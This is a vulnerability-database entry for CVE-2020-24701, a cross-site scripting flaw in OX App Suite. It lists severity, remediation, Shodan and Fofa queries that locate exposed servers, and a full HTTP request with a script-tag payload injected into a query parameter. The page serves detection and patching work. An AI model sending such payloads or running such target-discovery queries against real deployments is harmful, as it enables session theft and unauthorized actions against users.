🔙 목록으로 돌아가기

CVE-2020-24701: OX Appsuite - Cross-Site Scripting

TitleOX Appsuite - Cross-Site Scripting
AuthorDhiyaneshDk
SeverityMedium
ImpactAttackers can inject malicious JavaScript through the PATH_INFO parameter, potentially stealing session cookies or performing unauthorized actions on behalf of users.
RemediationUpgrade to OX App Suite version 7.10.5 or later.
CVSS Score6.1
EPSS Score0.40404
CVE IDCVE-2020-24701
CWE IDCWE-79
Shodan Queryhtml:"Appsuite"http.html:"appsuite"
Fofa Querybody="appsuite"
Tags cve cve2020 packetstorm seclists appsuite xss open-xchange vuln

🔍 Vulnerability Description

OX App Suite through 7.10.4 allows XSS via the app loading mechanism (the PATH_INFO to the /appsuite URI).

🌐 HTTP Request

GET /ajax/apps/manifests?action=all&format=debug&xss=<script>alert(document.domain);</script> HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Mobile/15E148 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-24701.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-24701.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A